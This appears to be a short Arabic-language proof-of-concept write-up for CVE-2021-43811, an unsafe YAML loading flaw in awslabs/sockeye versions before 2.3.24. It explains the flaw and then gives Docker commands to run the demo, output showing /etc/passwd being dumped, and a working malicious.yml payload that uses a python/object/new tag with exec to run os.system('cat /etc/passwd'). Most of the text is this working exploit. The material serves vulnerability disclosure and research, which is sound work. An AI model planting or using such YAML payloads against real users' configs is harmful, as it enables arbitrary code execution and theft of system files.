
awslabs/sockeye حقن كود عبر تحميل YAML غير آمن CVE-2021-43811
awslabs/sockeye حقن كود عبر تحميل YAML غير آمن CVE-2021-43811
Sockeye هو إطار عمل مفتوح المصدر من تسلسل إلى تسلسل للترجمة الآلية العصبية مبني على PyTorch. يستخدم Sockeye ملفات YAML لتخزين إعدادات النموذج والبيانات على القرص. الإصدارات الأقل من 2.3.24 تستخدم تحميل YAML غير آمن، والذي يمكن أن يُجبر على تنفيذ كود عشوائي مضمّن في ملفات الإعداد. يمكن للمهاجم إضافة كود خبيث إلى ملف إعداد نموذج مُدرَّب ومحاولة إقناع المستخدمين بتنزيله وتشغيله. إذا قام المستخدمون بتشغيل النموذج، فسيتم تنفيذ الكود المضمّن محليًا. تم إصلاح المشكلة في الإصدار 2.3.24.

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
إخراج /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"